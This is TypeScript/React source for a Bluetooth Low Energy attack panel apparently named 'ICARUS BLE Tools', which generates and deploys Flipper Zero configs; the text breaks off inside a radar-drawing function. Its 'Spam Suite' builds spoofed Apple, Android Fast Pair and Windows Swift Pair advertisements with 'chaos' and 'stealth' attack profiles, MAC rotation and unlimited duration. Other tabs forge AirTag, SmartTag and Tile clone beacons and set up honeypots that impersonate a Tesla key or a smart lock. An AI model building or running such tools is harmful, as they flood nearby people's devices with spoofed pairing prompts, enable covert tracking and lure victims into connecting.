import { useState, useRef, useEffect, useCallback } from 'react'
import { motion, AnimatePresence } from 'framer-motion'
import {
  Radio, Wifi, Bluetooth, Shield, Crosshair, Users, Copy, Download,
  Zap, Volume2, Clock, RotateCcw, Target, Send, Smartphone, Monitor,
  Apple, Cpu, Eye, AlertTriangle, ChevronDown, Play, Square
} from 'lucide-react'

// ─── BLE Packet Generation Helpers ────────────────────────────────────────────

function generateAppleAdvData(type: 'airpods' | 'airdrop' | 'findmy' | 'handoff' | 'appletv' | 'homepod'): string {
  const packets: Record<string, string> = {
    airpods: '0719010e2000000000000000000000000000000000000000',
    airdrop: '0509010001001a',
    findmy: '121907004d000000000000000000000000000000',
    handoff: '0c09080000000000000000001a',
    appletv: '0719010e200000000000000000000000000000000000000100',
    homepod: '0719010e2000000000000000000000000000000000000000ff'
  }
  return packets[type] || packets.airpods
}

const FAST_PAIR_MODELS: Record<string, string> = {
  'Bose NC 700': '0xCD8856',
  'JBL Flip 6': '0xF52494',
  'Pixel Buds Pro': '0xD4F4FA',
  'Galaxy Buds2 Pro': '0xA7C62B',
  'Sony WH-1000XM5': '0x1E89A7',
  'Google Pixel Buds': '0x718FA4',
  'JBL Buds Pro': '0x11B002',
  'Nothing Ear 1': '0x7B2692',
}

function generateFastPairAdv(modelId: string): string {
  const id = modelId.replace('0x', '')
  return `0201060BFFFE0006${id}00000000`
}

function generateSwiftPairAdv(): string {
  return '0201060AFF0600030080'
}

function generateIBeaconAdv(uuid: string, major: number, minor: number, txPower: number): string {
  const prefix = '0201061AFF4C000215'
  const uuidHex = uuid.replace(/-/g, '').toUpperCase()
  const majorHex = major.toString(16).padStart(4, '0').toUpperCase()
  const minorHex = minor.toString(16).padStart(4, '0').toUpperCase()
  const txHex = ((txPower & 0xFF) >>> 0).toString(16).padStart(2, '0').toUpperCase()
  return prefix + uuidHex + majorHex + minorHex + txHex
}

function generateEddystoneUrlAdv(url: string): string {
  const schemes: Record<string, string> = { 'http://www.': '00', 'https://www.': '01', 'http://': '02', 'https://': '03' }
  let schemeCode = '03'
  let remainder = url
  for (const [prefix, code] of Object.entries(schemes)) {
    if (url.startsWith(prefix)) {
      schemeCode = code
      remainder = url.slice(prefix.length)
      break
    }
  }
  const expansions: Record<string, string> = { '.com/': '00', '.org/': '01', '.edu/': '02', '.net/': '03', '.info/': '04', '.biz/': '05', '.gov/': '06', '.com': '07', '.org': '08', '.edu': '09', '.net': '0A', '.info': '0B', '.biz': '0C', '.gov': '0D' }
  let encoded = ''
  let i = 0
  while (i < remainder.length) {
    let matched = false
    for (const [exp, code] of Object.entries(expansions)) {
      if (remainder.slice(i).startsWith(exp)) {
        encoded += code
        i += exp.length
        matched = true
        break
      }
    }
    if (!matched) {
      encoded += remainder.charCodeAt(i).toString(16).padStart(2, '0')
      i++
    }
  }
  const serviceData = schemeCode + 'E8' + encoded
  const len = (serviceData.length / 2).toString(16).padStart(2, '0')
  return `020106${len}16AAFE10${serviceData}`.toUpperCase()
}

function generateEddystoneUidAdv(namespace: string, instance: string): string {
  const ns = namespace.replace(/\s/g, '').padEnd(20, '0').slice(0, 20).toUpperCase()
  const inst = instance.replace(/\s/g, '').padEnd(12, '0').slice(0, 12).toUpperCase()
  return `0201060317AAFE1516AAFE00E8${ns}${inst}0000`
}

function generateAirTagCloneAdv(publicKey: string): string {
  const key = publicKey.replace(/\s/g, '').padEnd(56, '0').slice(0, 56).toUpperCase()
  return `1EFF4C001219004D${key}`
}

function generateSmartTagCloneAdv(): string {
  return '0201060AFF750004000100000000'
}

function generateTileCloneAdv(): string {
  return '0201060EFF0D0001000000000000000000'
}

function randomMAC(): string {
  const bytes = Array.from({ length: 6 }, () => Math.floor(Math.random() * 256))
  bytes[0] = (bytes[0] | 0xC0) & 0xFE // Set locally administered, unicast
  return bytes.map(b => b.toString(16).padStart(2, '0').toUpperCase()).join(':')
}

function generateFlipperBleConfig(config: {
  name: string
  advData: string
  mac?: string
  interval?: number
  txPower?: string
}): string {
  const lines = [
    `Filetype: Flipper BLE Beacon`,
    `Version: 1`,
    `# Generated by ICARUS BLE Tools`,
    `Name: ${config.name}`,
    `MAC: ${config.mac || randomMAC()}`,
    `Interval: ${config.interval || 50}`,
    `TX_Power: ${config.txPower || 'medium'}`,
    `Adv_Data: ${config.advData}`,
  ]
  return lines.join('\n')
}

// ─── Shared UI Components ─────────────────────────────────────────────────────

const glassPanel = 'bg-gradient-to-b from-white/[0.03] to-transparent border border-gold/10 rounded-xl backdrop-blur-sm'
const glassPanelHover = `${glassPanel} hover:border-gold/25 transition-all duration-300`
const goldButton = 'px-4 py-2 rounded-lg font-display text-xs tracking-wider bg-gold/10 text-gold border border-gold/30 hover:bg-gold/20 hover:border-gold/50 transition-all duration-200 active:scale-95'
const goldButtonGlow = `${goldButton} shadow-[0_0_15px_rgba(234,179,8,0.15)] hover:shadow-[0_0_25px_rgba(234,179,8,0.3)]`
const inputClass = 'w-full bg-black/40 border border-gold/15 rounded-lg px-3 py-2 text-sm text-text-primary font-mono placeholder:text-text-tertiary/50 focus:outline-none focus:border-gold/40 focus:shadow-[0_0_10px_rgba(234,179,8,0.1)] transition-all'
const selectClass = 'bg-black/40 border border-gold/15 rounded-lg px-3 py-2 text-sm text-text-primary font-mono focus:outline-none focus:border-gold/40 transition-all appearance-none cursor-pointer'
const labelClass = 'text-[10px] font-display tracking-widest text-gold/60 uppercase mb-1'
const hexDisplayClass = 'font-mono text-xs p-3 rounded-lg bg-gold/[0.03] border border-gold/10 text-gold/80 break-all select-all leading-relaxed'

function GoldSlider({ value, min, max, step, onChange, label, unit }: {
  value: number; min: number; max: number; step?: number; onChange: (v: number) => void; label: string; unit?: string
}) {
  return (
    <div className="space-y-1">
      <div className="flex justify-between">
        <span className={labelClass}>{label}</span>
        <span className="text-[10px] font-mono text-gold/70">{value}{unit || ''}</span>
      </div>
      <input
        type="range" min={min} max={max} step={step || 1} value={value}
        onChange={e => onChange(Number(e.target.value))}
        className="w-full h-1.5 rounded-full appearance-none cursor-pointer"
        style={{
          background: `linear-gradient(to right, rgba(234,179,8,0.6) 0%, rgba(234,179,8,0.6) ${((value - min) / (max - min)) * 100}%, rgba(234,179,8,0.1) ${((value - min) / (max - min)) * 100}%, rgba(234,179,8,0.1) 100%)`,
        }}
      />
    </div>
  )
}

function GoldToggle({ value, onChange, label }: { value: boolean; onChange: (v: boolean) => void; label: string }) {
  return (
    <div className="flex items-center justify-between">
      <span className={labelClass}>{label}</span>
      <button
        onClick={() => onChange(!value)}
        className={`relative w-10 h-5 rounded-full transition-all duration-300 ${
          value ? 'bg-gold/30 border-gold/50' : 'bg-white/5 border-white/10'
        } border`}
      >
        <motion.div
          className={`absolute top-0.5 w-4 h-4 rounded-full ${value ? 'bg-gold shadow-[0_0_8px_rgba(234,179,8,0.5)]' : 'bg-white/30'}`}
          animate={{ left: value ? 20 : 2 }}
          transition={{ type: 'spring', stiffness: 500, damping: 30 }}
        />
      </button>
    </div>
  )
}

function CopyHexButton({ text }: { text: string }) {
  const [copied, setCopied] = useState(false)
  const handleCopy = async () => {
    await window.icarus.copyToClipboard(text)
    setCopied(true)
    setTimeout(() => setCopied(false), 1500)
  }
  return (
    <button onClick={handleCopy} className={goldButton + ' flex items-center gap-1.5'}>
      <Copy className="w-3 h-3" />
      {copied ? 'COPIED' : 'COPY HEX'}
    </button>
  )
}

function DeployButton({ config, name }: { config: string; name: string }) {
  const [deploying, setDeploying] = useState(false)
  const [result, setResult] = useState<'success' | 'error' | null>(null)
  const handleDeploy = async () => {
    setDeploying(true)
    try {
      const res = await window.icarus.deployPayload('ble', `${name}.txt`, config)
      setResult(res.success ? 'success' : 'error')
    } catch {
      setResult('error')
    }
    setDeploying(false)
    setTimeout(() => setResult(null), 2000)
  }
  return (
    <button onClick={handleDeploy} disabled={deploying} className={goldButtonGlow + ' flex items-center gap-1.5'}>
      <Send className="w-3 h-3" />
      {deploying ? 'DEPLOYING...' : result === 'success' ? 'DEPLOYED' : result === 'error' ? 'FAILED' : 'DEPLOY TO FLIPPER'}
    </button>
  )
}

function SaveButton({ content, filename }: { content: string; filename: string }) {
  return (
    <button onClick={() => window.icarus.saveFile(content, filename)} className={goldButton + ' flex items-center gap-1.5'}>
      <Download className="w-3 h-3" />
      SAVE FILE
    </button>
  )
}

// ─── Tab: Spam Suite ──────────────────────────────────────────────────────────

type AppleTarget = 'airpods' | 'airdrop' | 'findmy' | 'handoff' | 'appletv' | 'homepod'
type Platform = 'apple' | 'android' | 'windows' | 'all'
type AttackProfile = 'subtle' | 'aggressive' | 'chaos' | 'stealth'

const APPLE_TARGETS: { id: AppleTarget; label: string }[] = [
  { id: 'airpods', label: 'AirPods' },
  { id: 'airdrop', label: 'AirDrop' },
  { id: 'findmy', label: 'Find My' },
  { id: 'handoff', label: 'Handoff' },
  { id: 'appletv', label: 'Apple TV' },
  { id: 'homepod', label: 'HomePod' },
]

const ANDROID_MODELS = Object.keys(FAST_PAIR_MODELS)

const ATTACK_PROFILES: { id: AttackProfile; label: string; desc: string; icon: typeof Zap }[] = [
  { id: 'subtle', label: 'SUBTLE', desc: 'Slow interval, single platform, long duration', icon: Eye },
  { id: 'aggressive', label: 'AGGRESSIVE', desc: 'Fast interval, all platforms, MAC rotation', icon: Zap },
  { id: 'chaos', label: 'CHAOS', desc: 'Min interval, everything, max power', icon: AlertTriangle },
  { id: 'stealth', label: 'STEALTH', desc: 'Randomized intervals, single target, low power', icon: Shield },
]

function SpamSuiteTab() {
  const [platform, setPlatform] = useState<Platform>('apple')
  const [appleTarget, setAppleTarget] = useState<AppleTarget>('airpods')
  const [androidModel, setAndroidModel] = useState(ANDROID_MODELS[0])
  const [interval, setInterval_] = useState(50)
  const [macRotation, setMacRotation] = useState(true)
  const [macInterval, setMacInterval] = useState(2)
  const [power, setPower] = useState<'low' | 'medium' | 'high'>('medium')
  const [duration, setDuration] = useState('1min')
  const [generatedConfig, setGeneratedConfig] = useState('')
  const [generatedHex, setGeneratedHex] = useState('')

  const applyProfile = (id: AttackProfile) => {
    switch (id) {
      case 'subtle':
        setInterval_(500); setPlatform('apple'); setAppleTarget('airpods')
        setMacRotation(true); setMacInterval(5); setPower('low'); setDuration('10min')
        break
      case 'aggressive':
        setInterval_(20); setPlatform('all')
        setMacRotation(true); setMacInterval(1); setPower('high'); setDuration('5min')
        break
      case 'chaos':
        setInterval_(10); setPlatform('all')
        setMacRotation(true); setMacInterval(1); setPower('high'); setDuration('infinite')
        break
      case 'stealth':
        setInterval_(250); setPlatform('apple'); setAppleTarget('findmy')
        setMacRotation(true); setMacInterval(3); setPower('low'); setDuration('5min')
        break
    }
  }

  const generateOutput = () => {
    let advData = ''
    let name = 'ble_spam'

    if (platform === 'apple' || platform === 'all') {
      advData = generateAppleAdvData(appleTarget)
      name = `spam_apple_${appleTarget}`
    }
    if (platform === 'android') {
      advData = generateFastPairAdv(FAST_PAIR_MODELS[androidModel])
      name = `spam_android_${androidModel.replace(/\s+/g, '_').toLowerCase()}`
    }
    if (platform === 'windows') {
      advData = generateSwiftPairAdv()
      name = 'spam_windows_swiftpair'
    }
    if (platform === 'all') {
      // Combine multiple packets
      const apple = generateAppleAdvData('airpods')
      const android = generateFastPairAdv(FAST_PAIR_MODELS['Pixel Buds Pro'])
      const win = generateSwiftPairAdv()
      advData = `${apple}\n# Android Fast Pair\n${android}\n# Windows Swift Pair\n${win}`
      name = 'spam_all_chaos'
    }

    const durationMap: Record<string, string> = { '30s': '30', '1min': '60', '5min': '300', '10min': '600', 'infinite': '0' }
    const config = [
      `Filetype: Flipper BLE Spam Config`,
      `Version: 1`,
      `# Generated by ICARUS BLE Tools`,
      `# Platform: ${platform.toUpperCase()}`,
      `Name: ${name}`,
      `MAC: ${randomMAC()}`,
      `Interval: ${interval}`,
      `MAC_Rotation: ${macRotation ? 'on' : 'off'}`,
      `MAC_Rotation_Interval: ${macInterval}`,
      `TX_Power: ${power}`,
      `Duration: ${durationMap[duration] || '60'}`,
      `Adv_Data: ${advData.split('\n')[0]}`,
    ].join('\n')

    setGeneratedConfig(config)
    setGeneratedHex(advData)
  }

  return (
    <div className="space-y-5">
      {/* Platform Selector */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }}>
        <div className={labelClass + ' mb-3'}>Target Platform</div>
        <div className="flex gap-2">
          {(['apple', 'android', 'windows', 'all'] as Platform[]).map(p => (
            <button
              key={p}
              onClick={() => setPlatform(p)}
              className={`flex-1 py-2.5 rounded-lg text-xs font-display tracking-wider transition-all duration-200 border ${
                platform === p
                  ? 'bg-gold/15 text-gold border-gold/40 shadow-[0_0_12px_rgba(234,179,8,0.15)]'
                  : 'bg-white/[0.02] text-text-tertiary border-white/5 hover:border-gold/20 hover:text-gold/70'
              }`}
            >
              {p === 'all' ? 'ALL (CHAOS)' : p.toUpperCase()}
            </button>
          ))}
        </div>

        {/* Apple sub-targets */}
        {platform === 'apple' && (
          <motion.div className="mt-3 flex flex-wrap gap-1.5" initial={{ opacity: 0 }} animate={{ opacity: 1 }}>
            {APPLE_TARGETS.map(t => (
              <button
                key={t.id}
                onClick={() => setAppleTarget(t.id)}
                className={`px-3 py-1.5 rounded-md text-[10px] font-mono transition-all border ${
                  appleTarget === t.id
                    ? 'bg-gold/10 text-gold border-gold/30'
                    : 'bg-white/[0.02] text-text-tertiary border-white/5 hover:text-gold/60'
                }`}
              >
                {t.label}
              </button>
            ))}
          </motion.div>
        )}

        {/* Android model picker */}
        {platform === 'android' && (
          <motion.div className="mt-3" initial={{ opacity: 0 }} animate={{ opacity: 1 }}>
            <div className={labelClass + ' mb-1.5'}>Device Model</div>
            <select value={androidModel} onChange={e => setAndroidModel(e.target.value)} className={selectClass + ' w-full'}>
              {ANDROID_MODELS.map(m => <option key={m} value={m}>{m} ({FAST_PAIR_MODELS[m]})</option>)}
            </select>
          </motion.div>
        )}
      </motion.div>

      {/* Settings */}
      <motion.div className={glassPanel + ' p-4 space-y-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.1 }}>
        <div className={labelClass}>Settings</div>
        <GoldSlider value={interval} min={10} max={1000} step={10} onChange={setInterval_} label="Packet Interval" unit="ms" />
        <GoldToggle value={macRotation} onChange={setMacRotation} label="MAC Rotation" />
        {macRotation && <GoldSlider value={macInterval} min={1} max={10} onChange={setMacInterval} label="MAC Rotation Interval" unit="s" />}
        <div>
          <div className={labelClass + ' mb-1.5'}>Broadcast Power</div>
          <div className="flex gap-2">
            {(['low', 'medium', 'high'] as const).map(p => (
              <button
                key={p}
                onClick={() => setPower(p)}
                className={`flex-1 py-2 rounded-lg text-[10px] font-display tracking-wider border transition-all ${
                  power === p ? 'bg-gold/15 text-gold border-gold/40' : 'bg-white/[0.02] text-text-tertiary border-white/5 hover:text-gold/60'
                }`}
              >
                {p.toUpperCase()}
              </button>
            ))}
          </div>
        </div>
        <div>
          <div className={labelClass + ' mb-1.5'}>Duration</div>
          <div className="flex gap-1.5 flex-wrap">
            {['30s', '1min', '5min', '10min', 'infinite'].map(d => (
              <button
                key={d}
                onClick={() => setDuration(d)}
                className={`px-3 py-1.5 rounded-md text-[10px] font-mono border transition-all ${
                  duration === d ? 'bg-gold/10 text-gold border-gold/30' : 'bg-white/[0.02] text-text-tertiary border-white/5 hover:text-gold/60'
                }`}
              >
                {d === 'infinite' ? '\u221E' : d}
              </button>
            ))}
          </div>
        </div>
      </motion.div>

      {/* Attack Profiles */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.15 }}>
        <div className={labelClass + ' mb-3'}>Attack Profiles</div>
        <div className="grid grid-cols-2 gap-2">
          {ATTACK_PROFILES.map(p => (
            <button
              key={p.id}
              onClick={() => applyProfile(p.id)}
              className={glassPanelHover + ' p-3 text-left group'}
            >
              <div className="flex items-center gap-2 mb-1">
                <p.icon className="w-3.5 h-3.5 text-gold/60 group-hover:text-gold transition-colors" />
                <span className="text-xs font-display tracking-wider text-gold/80 group-hover:text-gold transition-colors">{p.label}</span>
              </div>
              <span className="text-[9px] text-text-tertiary leading-tight">{p.desc}</span>
            </button>
          ))}
        </div>
      </motion.div>

      {/* Generate */}
      <motion.div className="flex gap-2" initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.2 }}>
        <button onClick={generateOutput} className={goldButtonGlow + ' flex-1 py-3 flex items-center justify-center gap-2'}>
          <Zap className="w-4 h-4" />
          GENERATE CONFIG
        </button>
      </motion.div>

      {/* Output */}
      {generatedConfig && (
        <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }}>
          <div className={labelClass}>Generated Config</div>
          <pre className={hexDisplayClass + ' whitespace-pre-wrap text-[11px]'}>{generatedConfig}</pre>
          <div className={labelClass + ' mt-3'}>Raw Advertisement Hex</div>
          <div className={hexDisplayClass}>{generatedHex}</div>
          <div className="flex gap-2 pt-1">
            <CopyHexButton text={generatedHex} />
            <SaveButton content={generatedConfig} filename="ble_spam_config.txt" />
            <DeployButton config={generatedConfig} name="ble_spam" />
          </div>
        </motion.div>
      )}
    </div>
  )
}

// ─── Tab: Beacon Forge ────────────────────────────────────────────────────────

type BeaconType = 'ibeacon' | 'eddystone-url' | 'eddystone-uid' | 'airtag' | 'smarttag' | 'tile' | 'custom'

const BEACON_TYPES: { id: BeaconType; label: string }[] = [
  { id: 'ibeacon', label: 'iBeacon' },
  { id: 'eddystone-url', label: 'Eddystone-URL' },
  { id: 'eddystone-uid', label: 'Eddystone-UID' },
  { id: 'airtag', label: 'AirTag Clone' },
  { id: 'smarttag', label: 'SmartTag Clone' },
  { id: 'tile', label: 'Tile Clone' },
  { id: 'custom', label: 'Custom' },
]

function BeaconForgeTab() {
  const [beaconType, setBeaconType] = useState<BeaconType>('ibeacon')
  const [uuid, setUuid] = useState('FDA50693-A4E2-4FB1-AFCF-C6EB07647825')
  const [major, setMajor] = useState(1)
  const [minor, setMinor] = useState(1)
  const [txPower, setTxPower] = useState(-59)
  const [url, setUrl] = useState('https://example.com')
  const [namespace, setNamespace] = useState('EDD1EBEAC04E5DEFA017')
  const [instance, setInstance] = useState('0BDB87539B67')
  const [publicKey, setPublicKey] = useState('')
  const [customHex, setCustomHex] = useState('')

  const getAdvData = useCallback((): string => {
    switch (beaconType) {
      case 'ibeacon': return generateIBeaconAdv(uuid, major, minor, txPower)
      case 'eddystone-url': return generateEddystoneUrlAdv(url)
      case 'eddystone-uid': return generateEddystoneUidAdv(namespace, instance)
      case 'airtag': return generateAirTagCloneAdv(publicKey || '0'.repeat(56))
      case 'smarttag': return generateSmartTagCloneAdv()
      case 'tile': return generateTileCloneAdv()
      case 'custom': return customHex.replace(/\s/g, '').toUpperCase()
      default: return ''
    }
  }, [beaconType, uuid, major, minor, txPower, url, namespace, instance, publicKey, customHex])

  const advData = getAdvData()
  const config = generateFlipperBleConfig({ name: `beacon_${beaconType}`, advData })

  return (
    <div className="space-y-5">
      {/* Beacon Type Selector */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }}>
        <div className={labelClass + ' mb-3'}>Beacon Type</div>
        <div className="flex flex-wrap gap-1.5">
          {BEACON_TYPES.map(t => (
            <button
              key={t.id}
              onClick={() => setBeaconType(t.id)}
              className={`px-3 py-2 rounded-lg text-[10px] font-display tracking-wider border transition-all ${
                beaconType === t.id
                  ? 'bg-gold/15 text-gold border-gold/40 shadow-[0_0_10px_rgba(234,179,8,0.1)]'
                  : 'bg-white/[0.02] text-text-tertiary border-white/5 hover:text-gold/60'
              }`}
            >
              {t.label}
            </button>
          ))}
        </div>
      </motion.div>

      {/* Parameters */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.1 }}>
        <div className={labelClass}>Parameters</div>

        {beaconType === 'ibeacon' && (
          <>
            <div>
              <div className={labelClass}>UUID</div>
              <input value={uuid} onChange={e => setUuid(e.target.value)} className={inputClass} placeholder="FDA50693-A4E2-4FB1-AFCF-C6EB07647825" />
            </div>
            <div className="grid grid-cols-2 gap-3">
              <div>
                <div className={labelClass}>Major</div>
                <input type="number" value={major} onChange={e => setMajor(Number(e.target.value))} className={inputClass} min={0} max={65535} />
              </div>
              <div>
                <div className={labelClass}>Minor</div>
                <input type="number" value={minor} onChange={e => setMinor(Number(e.target.value))} className={inputClass} min={0} max={65535} />
              </div>
            </div>
            <GoldSlider value={txPower} min={-100} max={0} onChange={setTxPower} label="TX Power" unit=" dBm" />
          </>
        )}

        {beaconType === 'eddystone-url' && (
          <div>
            <div className={labelClass}>URL (max 17 bytes encoded)</div>
            <input value={url} onChange={e => setUrl(e.target.value)} className={inputClass} placeholder="https://example.com" />
          </div>
        )}

        {beaconType === 'eddystone-uid' && (
          <>
            <div>
              <div className={labelClass}>Namespace (10 bytes hex)</div>
              <input value={namespace} onChange={e => setNamespace(e.target.value)} className={inputClass} placeholder="EDD1EBEAC04E5DEFA017" />
            </div>
            <div>
              <div className={labelClass}>Instance (6 bytes hex)</div>
              <input value={instance} onChange={e => setInstance(e.target.value)} className={inputClass} placeholder="0BDB87539B67" />
            </div>
          </>
        )}

        {beaconType === 'airtag' && (
          <div>
            <div className={labelClass}>Public Key (28 bytes hex)</div>
            <input value={publicKey} onChange={e => setPublicKey(e.target.value)} className={inputClass} placeholder="Enter public key hex..." />
          </div>
        )}

        {beaconType === 'smarttag' && (
          <div className="text-xs text-text-tertiary font-mono py-2">SmartTag clone uses Samsung manufacturer data. Packet is pre-configured.</div>
        )}

        {beaconType === 'tile' && (
          <div className="text-xs text-text-tertiary font-mono py-2">Tile clone uses Tile advertisement structure. Packet is pre-configured.</div>
        )}

        {beaconType === 'custom' && (
          <div>
            <div className={labelClass}>Raw Advertisement Data (hex)</div>
            <textarea
              value={customHex}
              onChange={e => setCustomHex(e.target.value)}
              className={inputClass + ' h-24 resize-none'}
              placeholder="Enter raw hex advertisement data..."
            />
          </div>
        )}
      </motion.div>

      {/* Live Preview */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.15 }}>
        <div className={labelClass}>Live Packet Preview</div>
        <div className={hexDisplayClass}>{advData || 'No data'}</div>
        <div className="text-[9px] text-text-tertiary font-mono">{advData ? Math.ceil(advData.length / 2) : 0} bytes</div>
        <div className="flex gap-2 pt-1">
          <CopyHexButton text={advData} />
          <SaveButton content={config} filename={`beacon_${beaconType}.txt`} />
          <DeployButton config={config} name={`beacon_${beaconType}`} />
        </div>
      </motion.div>
    </div>
  )
}

// ─── Tab: Honeypot ────────────────────────────────────────────────────────────

const HONEYPOT_PRESETS: {
  id: string; label: string; name: string; serviceUUIDs: string[]; manufacturerData: string; txPower: number
}[] = [
  { id: 'airpods-max', label: 'AirPods Pro Max', name: 'AirPods Pro Max', serviceUUIDs: ['FEC9', 'FE2C'], manufacturerData: '4C000719010E2000000000000000000000', txPower: -40 },
  { id: 'smart-lock', label: 'Smart Lock (August)', name: 'August Smart Lock Pro', serviceUUIDs: ['FE24', '1831'], manufacturerData: 'FE24000102030405', txPower: -55 },
  { id: 'tesla-key', label: 'Tesla Key Card', name: 'Tesla Vehicle', serviceUUIDs: ['FEF5'], manufacturerData: '0211064C6573746B6579', txPower: -45 },
  { id: 'obd2', label: 'OBD2 Scanner', name: 'OBD-II ELM327', serviceUUIDs: ['FFF0', 'FFE0'], manufacturerData: '454C4D333237', txPower: -50 },
  { id: 'fitness', label: 'Fitness Tracker', name: 'Mi Band 8', serviceUUIDs: ['FEE0', '180D', '180F'], manufacturerData: '5701000000FFFE', txPower: -60 },
  { id: 'speaker', label: 'Wireless Speaker', name: 'JBL Charge 5', serviceUUIDs: ['FE07'], manufacturerData: '02010611FF8700', txPower: -45 },
  { id: 'smarthub', label: 'Smart Home Hub', name: 'SmartThings Hub', serviceUUIDs: ['FE2C', '1800', '1801'], manufacturerData: '750000010002', txPower: -50 },
]

function HoneypotTab() {
  const [selectedPreset, setSelectedPreset] = useState(HONEYPOT_PRESETS[0].id)
  const [deviceName, setDeviceName] = useState(HONEYPOT_PRESETS[0].name)
  const [serviceUUIDs, setServiceUUIDs] = useState(HONEYPOT_PRESETS[0].serviceUUIDs.join(', '))
  const [mfgData, setMfgData] = useState(HONEYPOT_PRESETS[0].manufacturerData)
  const [txPwr, setTxPwr] = useState(HONEYPOT_PRESETS[0].txPower)
  const [logPath, setLogPath] = useState('/ext/apps_data/ble_honeypot/log.txt')

  const selectPreset = (id: string) => {
    const p = HONEYPOT_PRESETS.find(x => x.id === id)
    if (p) {
      setSelectedPreset(id)
      setDeviceName(p.name)
      setServiceUUIDs(p.serviceUUIDs.join(', '))
      setMfgData(p.manufacturerData)
      setTxPwr(p.txPower)
    }
  }

  const config = [
    `Filetype: Flipper BLE Honeypot`,
    `Version: 1`,
    `# Generated by ICARUS BLE Tools`,
    `Device_Name: ${deviceName}`,
    `Service_UUIDs: ${serviceUUIDs}`,
    `Manufacturer_Data: ${mfgData}`,
    `TX_Power: ${txPwr}`,
    `Log_Path: ${logPath}`,
    `MAC: ${randomMAC()}`,
  ].join('\n')

  return (
    <div className="space-y-5">
      {/* Presets */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }}>
        <div className={labelClass + ' mb-3'}>Device Presets</div>
        <div className="grid grid-cols-2 gap-2">
          {HONEYPOT_PRESETS.map(p => (
            <button
              key={p.id}
              onClick={() => selectPreset(p.id)}
              className={`${glassPanelHover} p-3 text-left ${selectedPreset === p.id ? 'border-gold/40 bg-gold/[0.06]' : ''}`}
            >
              <div className="text-xs font-display tracking-wider text-gold/80">{p.label}</div>
              <div className="text-[9px] text-text-tertiary font-mono mt-0.5">{p.name}</div>
            </button>
          ))}
        </div>
      </motion.div>

      {/* Config */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.1 }}>
        <div className={labelClass}>Configuration</div>
        <div>
          <div className={labelClass}>Device Name</div>
          <input value={deviceName} onChange={e => setDeviceName(e.target.value)} className={inputClass} />
        </div>
        <div>
          <div className={labelClass}>Service UUIDs (comma separated)</div>
          <input value={serviceUUIDs} onChange={e => setServiceUUIDs(e.target.value)} className={inputClass} />
        </div>
        <div>
          <div className={labelClass}>Manufacturer Data (hex)</div>
          <input value={mfgData} onChange={e => setMfgData(e.target.value)} className={inputClass} />
        </div>
        <GoldSlider value={txPwr} min={-100} max={0} onChange={setTxPwr} label="TX Power Level" unit=" dBm" />
        <div>
          <div className={labelClass}>Flipper SD Log Path</div>
          <input value={logPath} onChange={e => setLogPath(e.target.value)} className={inputClass} />
        </div>
      </motion.div>

      {/* Output */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.15 }}>
        <div className={labelClass}>Generated Config</div>
        <pre className={hexDisplayClass + ' whitespace-pre-wrap text-[11px]'}>{config}</pre>
        <div className="flex gap-2 pt-1">
          <CopyHexButton text={mfgData} />
          <SaveButton content={config} filename={`honeypot_${selectedPreset}.txt`} />
          <DeployButton config={config} name={`honeypot_${selectedPreset}`} />
        </div>
      </motion.div>
    </div>
  )
}

// ─── Tab: Proximity Trigger ───────────────────────────────────────────────────

function ProximityRadar({ rssiThreshold }: { rssiThreshold: number }) {
  const canvasRef = useRef<HTMLCanvasElement>(null)

  useEffect(() => {
    const canvas = canvasRef.current
    if (!canvas) return
    const ctx = canvas.getContext('2d')
    if (!ctx) return

    const w = canvas.width
    const h = canvas.height
    const cx = w / 2
    const cy = h / 2
    const maxR = Math.min(cx, cy) - 10

    ctx.clearRect(0, 0, w, h)

    // Background
    ctx.fillStyle = 'rgba(0,0,0,0.3)'
    ctx.fillRect(0, 0, w, h)

    // Concentric circles with RSSI labels
    const rssiLevels = [-30, -40, -50, -60, -70, -80, -90]
    for (const rssi of rssiLevels) {
      const ratio = (rssi - (-90)) / (-30 - (-90))
      const r = maxR * (1 - ratio)
      ctx.beginPath()
      ctx.arc(cx, cy, r, 0, Math.PI * 2)
      ctx.strokeStyle = 'rgba(234,179,8,0.12)'
      ctx.lineWidth = 1
      ctx.stroke()

      ctx.fillStyle = 'rgba(234,179,8,0.3)'
      ctx.font = '9px monospace'
      ctx.fillText(`${rssi}`, cx + r + 3, cy - 2)
    }

    // Trigger zone
    const triggerRatio = (rssiThreshold - (-90)) / (-30 - (-90))
    const triggerR = maxR * (1 - triggerRatio)

    ctx.beginPath()
    ctx.arc(cx, cy, triggerR, 0, Math.PI * 2)
    ctx.fillStyle = 'rgba(234,179,8,0.06)'
    ctx.fill()
    ctx.strokeStyle = 'rgba(234,179,8,0.5)'
    ctx.lineWidth = 2
    ctx.setLineDash([4, 4])
    ctx.stroke()
    ctx.setLineDash([])

    // "TRIGGER ZONE" label
    ctx.fillStyle = 'rgba(234,179,8,0.7)'
    ctx.font = 'bold 10px monospace'
    ctx.textAlign = 'center'
    ctx.fillText('TRIGGER ZONE', cx, cy + triggerR + 14)

    // Center dot (Flipper)
    ctx.beginPath()
    ctx.arc(cx, cy, 5, 0, Math.PI * 2)
    ctx.fillStyle = 'rgba(234,179,8,0.8)'
    ctx.fill()
